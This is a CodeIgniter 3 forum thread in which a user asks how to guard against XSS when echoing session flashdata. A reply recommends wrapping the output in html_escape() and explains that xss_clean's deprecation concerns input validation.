+- CodeIgniter Forums (https://forum.codeigniter.com)
+-- Forum: Development (https://forum.codeigniter.com/forumdisplay.php?fid=6)
+--- Forum: CodeIgniter 3.x (https://forum.codeigniter.com/forumdisplay.php?fid=17)
+--- Thread: xss flashdata class (/showthread.php?tid=76318)
xss flashdata class - az1409 - 05-02-2020
Hi All,
If I need to sanitize below piece of code in CI (v3.1.10)
<?php echo $this>session->flashdata('error'); ?>
How to do it?????
and one more thing xss_clean is completely deprecated inĀ CI (v3.1.10) so we can not use it????
RE: xss flashdata class - jreklund - 05-03-2020
You should use html_escape() or xss_clean() when you print strings that are not XSS safe. Personally I use html_escape() as I don't want anything to have the slightest chance on slipping thru.
PHP Code:
<?php echo html_escape($this>session->flashdata('error')); ?>It's deprecated from input validation, as you should filter your data. Do you only want numbers? Check that it's not a letter etc.
RE: xss flashdata class - az1409 - 05-03-2020
(05-03-2020, 02:08 AM)jreklund Wrote: You should use html_escape() or xss_clean() when you print strings that are not XSS safe. Personally I use html_escape() as I don't want anything to have the slightest chance on slipping thru.
PHP Code:<?php echo html_escape($this>session->flashdata('error')); ?>
It's deprecated from input validation, as you should filter your data. Do you only want numbers? Check that it's not a letter etc.
Thanks for your quick help and response!!